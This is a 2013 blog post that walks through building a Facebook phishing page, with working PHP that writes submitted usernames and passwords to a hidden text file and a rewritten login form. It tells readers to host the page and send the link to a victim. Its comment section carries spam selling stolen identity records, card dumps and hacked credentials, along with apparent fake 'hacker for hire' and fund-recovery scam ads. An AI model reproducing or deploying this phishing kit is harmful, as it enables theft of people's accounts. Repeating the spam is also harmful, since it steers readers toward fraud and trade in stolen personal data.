Sunday, April 28, 2013
Hacking is so common nowadays stay alert otherwise you can become victim of it.
Like our page and prevent yourself to become a victim of someone's hack..:). I will share how to hack, how to prevent yourself from attacks and fun stuff as usual.
Like us now on facebook
I have implemented my first phishing a way 5 years back, when we used to surf orkut. That was for someone special ;) but after so many request, i think a ton's of(:p) i am going to share working Phishing example, if you follow each step then you will succeed.
P.S. This tutorial is just for educational purpose, i really don't want you to hack someone's account.
INTRODUCTION TO PHISHING
According to Wikipedia: Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.
In simple words: By PHISHING we get user login detail by showing the exact page of the that website. This is just making fool of the user. And mostly internet geeks can know that the page is fake.
So now start with PHISHING demonstration on one of your favorite website. i.e. facebook
THINGS WE NEED
Any text editor: I prefer Notepad++Internet connection
Free or paid hosting service
Little know of HTML
DEMONSTRATION
So, lets start the demonstration of PHISHING with one of your favorite social networking website. And this method will be apply to each website like gmail, yahoo, hotmail, facebook, twitter, flikr, rediffmail, etc which provide the login service.Let's start with facebook.:)
You can download these files which i have created for phishing purpose or you can follow the steps given below. CLICK HERE TO DOWNLOAD.
Step 1: Register on any free web-hosting website. Some website give cpanel hosting, which is better for PHISHING, so i suggest you to go with
www.0fees.net
www.000webhost.com
byethost.com
And i personally using www.0fees.net. You can choose any one.
Step 2: Now go facebook.com and press Ctrl+U or right click on web page and click view source, copy all the source code and paste it into the new notepad file. P.S. We need the login page of facebook, so if you are logged in, log out and then copy the source code.
Step 3: Now save notepad file with name "index.html" on your desktop or a folder but without the quotes.
Step 4: Now open one more notepad file and copy the below code in it.
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("tpcm.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save it with any "anyname.php", I will save with "login.php", you can put any name that you want but ensure extension is “.php”.
In content there is a file "tpcm.txt", you can put any name to txt which is not guessable. Try to set it unguessable.
Step 5: Open index.html file with notepad or any text editor you prefer, and find(Ctrl+F) keyword “action” there. You will see something like this:
<form id="login_form" action="https://www.facebook.com/login.php?login_a...."
remove this whole <form tag> and replace with this tag.
<form method="GET" action="login.php" id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit && d.onsubmit(event);">
<div id="loginform" style=""><table cellspacing="0"><tr><td class="html7magic"><label for="email" id="label_email">Email or Phone</label></td><td class="html7magic"><label for="pass" id="label_pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="formchange()" /><td><input type="password" class="inputpassword" id="pass" name="pass" value="" /></td><td><label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_6"><input value="Log In" tabindex="4" type="submit" id="u_0_6" /></label></td></tr><tr><td class="login_form_label_field"><div><div class="uiInputLabel clearfix"><input id="persist_box" type="checkbox" name="persistent" value="1" tabindex="3" class="uiInputLabelCheckbox" /><label for="persist_box">Keep me logged in</label></div><input type="hidden" name="default_persistent" value="0" /></div></td><td class="login_form_label_field"><a rel="nofollow" href="http://www.facebook.com/recover/initiate">Forgot your password?</a></td></tr></table></div></form>
Save it and close the file.
Step-6: Now upload login.php and index.html file to you hosting directory. If it is cpanel account, upload files into file_manager -> public_html and see the attached screen shot, most of the hosting sites, has same kind of UI.
 |
| Click on file manager |
 |
| Click on htdocs |
 |
| Select all files |
 |
| Click Delete |
 |
| Click on check |
 |
| Click back |
 |
| Click Upload |
 |
| Click choose files |
 |
| Click on check |
 |
| You will see something like this |
Step 7: Now visit to your website(provided by your hosting mine is lifeishell.0fees.net) you will see a phishing page of facebook, test it to see if it works or not, and send this link to your victim, say anything like join my network or any social trick and force victim to visit you page and let him/her enter the username and password.
Once he/she enter information, username and password will be save into tpcm.txt file and victim will redirect to facebook’s original link facebook.com. Victim will seems like he did enter wrong username and password so he should enter again, when he again will enter a info, he/she will successfully login into their facebook account.
Step 8: Now go to lifeishell.0fees.net/tpcm.txt and see the username and password of victim. or you can again visit to your cpanel, here in file manager–>public_html you will se a file tpcm.txt, open it to view victim’s username and password.
(This is why i suggested you to give textfile a name which is unguessable).
YOU CAN EVEN CHECK LIVE EXAMPLE HERE.
Site: lifeishell
Password Text FIle: Password
\m/....RocK oN....\m/
Hacking is so common nowadays stay alert otherwise you can become victim of it.
Like our page and prevent yourself to become a victim of someone's hack..:). I will share how to hack, how to prevent yourself from attacks and fun stuff as usual.
Like us now on facebook
.jpg)
HAHAHA.......how do u select a domain name appropriate to fb
ReplyDeleteand 1 more thing it doesnt use https and not even a encrypted connection
DeleteWell, it is up to you...and your creativity...think what is best suited according to targeted user and scheme you will gonna play :)
Deletebut my login and password ka block is cuming double times
ReplyDeleteHey Admin!
ReplyDeleteWhere will I get the username and password??
In the DB you will make
DeleteCONTACT 24/7
ReplyDeleteTelegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
Selling SSN+Dob Leads/Fullz with Driving License/ID Number For Tax return & W-2 Form filling, etc.
>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)
Price reduce in Bulk order
DETAILS IN LEADs/FULLZ/PROS
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS
>All Leads are Spammed & Verified.
>Fresh spammed data of USA Credit Bureau
>Good credit Scores, 700 minimum scores
>Invalid info found, will be replaced.
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY
''OTHER GADGETS PROVIDING''
>SSN+DOB Fullz
>CC with CVV
>Photo ID's
>Dead Fullz
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords
Contact 24/7
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
NO UPFRONT PAYMENT!
ReplyDeleteAre you a victim of:
1. Binary option scam?
2. Forex trading?
3. Romance scam/Cheating Spouse
4. ICO Scams
5. Online betting scams
6. Bitcoin scam
7. Phishing scam
or any other kind of scam?
I bring you great news. JODY HACKLORD is the best and most reliable Fund Recovery team you will ever come across
Service delivery is top notch and second to none.
Contact
Email: hacklordjody@gmail.com
You Can Also Text Or Call or Whatsapp: +1 (908) 991‑6649
I was frustrated and disturbed when i suspect my partner was cheating on me. i couldn’t confront him because he’ll always lie about it. i went for counseling and a came in contact with schwartzsoftwarehackingprogram@gmail.com ,i never buy the idea after a few process, he did a data dive into my partner mobile and he did it,
ReplyDeletehe provide me with all the evidence i need, starting from the emails, calls, WhatsApp chat and lot more, it was a shocking moment was not happy about what i saw. it wasn’t easy to move on, but am now free from all his lies, there services are cheap and affordable i never believed this until i saw the evidence, we all need to be free and live happily…
He offer services which includes:
He specializes in the following services :
*Spy on Cheating Partners
*Identification of Cheating Partner or Employee, Mole in a system.
*Keeping Tabs on Employees or Doing Online Background Checks
*Gaining Full Access To Any Mobile Device, WhatsApp, Email, Gps, Snapchat, Instagram, Facebook ,Kik, hangout ,Viber And Any Other Social Media Accounts
*Accessing University Portals or Any Website of your choice . reach out to them on
Email : schwartzsoftwarehackingprogram@gmail.com
Contact detail :+1 704-313-9661
BITCOIN RECOVERY IS REAL!!! ( MorrisGray830 At gmail Dot Com, is the man for the job ) This man is dedicated to his work and you can trust him more than yourself. I contacted him a year and a half Ago and he didn't succeed. when i got ripped of $491,000 worth of bitcoins by scammers, I tried several recovery programs with no success too. I kept on. And now after so much time Mr Morris Gray contacted me with a success, and the reward he took was small because obviously he is doing this because he wants to help persons like me who fell for crypto scam, and love his job. Of course he could have taken all the coins and not tell me , I was not syncing this wallet for a year, but he didn't. He is the MAN guys , He is! If you have been a victim of crypto scam before you can trust Morris Gray 10000000%. I thought there were no such good genuine guys anymore on earth, but Mr Morris Gray brought my trust to humanity again. GOD bless you sir...you can reach him via ( MORRIS GRAY 830 at Gmaill dot com ) or Whatsapp +1 (607)698-0239..
ReplyDeleteHello, I had my Coinbase account compromised and $14,300 total stolen ($9,600 in crypto and $4,700 from my Bank Account. I obviously froze my Coinbase and Bank account as soon as I saw somebody had changed my password, but after putting in a Coinbase claim for fraud 24 hours ago I just received my account back minus all of the money I had. I am asking for assistance if anybody can help me determine what the next step would be for recovering my funds. Putting years and work into crypto and having a single service ruin it all for me would really hurt. Thanks to craker@cyberdude.com he was able to recover my money and I was really excited for the service.
ReplyDeleteYou can also reach out to him via WhatsApp +1 (908) 533‑1382
God bless 🙏🙏
There are many reasons why you might need a hacker, you might want to access some classified information that you have not been authorized to access.
ReplyDeleteYou need a hacker to recover your bitcoins from any investment scams
You might have been scammed before and you need a hacker to help you recover your funds and trace the scammer.
You might want to spy on someone maybe your spouse or workers or even go into your school server to upgrade your exam grade.
You need a hacker to hack into any remote device such as Laptops, smartphones, remote databases, and personal records and to clear your name from the crime database.
Whatever you need and intend to do, you need a hacker, and not just any hacker but you need a professional hacker that can do that in a matter of hours. That is why you need a hacker like Wardrivers cyber service, they are professional hackers who can provide any of those services listed above. Don’t hesitate to contact them via E-MAIL (wardriverscyberservice@techie.com) and on WhatsApp at +1 (616) 898-7285
Good day everyone, I was ashamed to share this but I thought I should as it will be beneficial to someone out there considering the different scams that are happening over the internet, I met this guy online and we started talking, he was very sweet and I never imagined he was going to scam me of my hard-earned money, I sent him a total of $235,000.00 through Bitcoin and bank account, this was going on for weeks and after he took everything from home, he blocked me and stopped picking my calls. I thought all hope was lost until I saw an article on Facebook about a hacker who could help me recover all that I had lost without breaking a sweat, I was not very convinced about it considering I was just scammed but I thought of it and said this couldn’t go wrong than it already did, and to my surprise Cyberwallfire@techie .com was able to recover all my money after I contacted them. This should be a lesson to everyone out there to be aware of internet scams and if you have been scammed of your hard-earned money before then go ahead and contact cyberwallfire@techie.com to help you with the recovery of your money
ReplyDeleteI never thought I will get scammed by online bitcoin investors which I was warned by friends not to invest online or apply for exchange from unknown online investors, they stole all my life saving ranging to a total sum of $97,800k [ninety seven thousand eight hundred dollars] worth of bitcoin, i started regretting my life untill i came acrose some article online about jamesmckaywizard a geniune hacker who is into any kind of hacking and helping people recover their lost funds via online scam, I still didn't believe bitcoin can ever be recovered, but had to once again trust my guts and insticts. To my greatest surprise mr james was able to carry out the job neatly without any traces or complications all thanks to him and his team for offerring me a top notch services. To that one person or persons out there who really need a true and efficient hacker l would advice you to contact: Email: jamesmckaywizard@gmail.com / What's App:+91 98632 93475
ReplyDelete